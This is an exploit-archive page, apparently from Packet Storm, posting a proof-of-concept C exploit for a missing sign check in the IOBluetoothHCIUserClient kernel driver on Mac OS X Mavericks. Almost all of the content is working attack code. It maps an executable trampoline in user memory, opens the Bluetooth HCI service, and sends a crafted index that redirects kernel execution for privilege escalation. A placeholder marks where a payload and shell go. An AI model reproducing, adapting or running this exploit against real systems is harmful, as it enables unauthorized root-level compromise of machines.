exploit the possibilities

Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation

Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation
Posted Nov 3, 2014
Authored by Roberto Paleari, Aristide Fattori

This proof of concept exploits a missing sign check in IOBluetoothHCIUserClient::SimpleDispatchWL() on Mac OS X Mavericks.

tags | exploit, proof of concept
systems | apple, osx
MD5 | e5b206d87c9ccb563fc84bccb0d2df66

Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation

Change Mirror Download
/*
* pwn.c, by @rpaleari and @joystick
*
* This PoC exploits a missing sign check in
* IOBluetoothHCIUserClient::SimpleDispatchWL().
*
* Tested on Mac OS X Mavericks (10.9.4/10.9.5).
*
* Compile with: gcc -Wall -o pwn{,.c} -framework IOKit
*
*/

#include <stdio.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

uint64_t payload() {
/* Your payload goes here. */
}

int main(void) {
/* Map our landing page (kernel will jump at tgt+7) */
vm_address_t tgt = 0x0000048800000000;
vm_allocate(mach_task_self(), &tgt, 0x1000, 0);
vm_protect(mach_task_self(), tgt, 0x1000, 0,
VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE);
memset((void *)tgt, 0, 0x1000);

/* Prepare payload */
char *target = (char *)tgt;

/* mov rax, payload */
target[7] = 0x48;
target[8] = 0xb8;
*((uint64_t *)(&target[9])) = (uint64_t) payload;

/* jmp rax */
target[17] = 0xff;
target[18] = 0xe0;

printf(" [+] Payload function @ %016llx\n", (uint64_t) payload);
printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7);

/* Find the vulnerable service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));

if (!service) {
return -1;
}

/* Connect to the vulnerable service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}

printf(" [+] Opened connection to service on port: %d\n", port);

/* The first 8 bytes must be 0, so we don't have to handle following
parameters */
char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"
/* Don't really matter for the exploit (ignored due to the 0s above) */
"\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"
"\x80\xff\xff\xff"
/* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel
memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May
need to be adjusted on other Mavericks versions. */
"\xa8\xb6\xf5\xff\x80\xff\xff\xff";

printf(" [+] Launching exploit!\n");
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */

/* Exec shell here after payload returns */

return IOServiceClose(port);
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close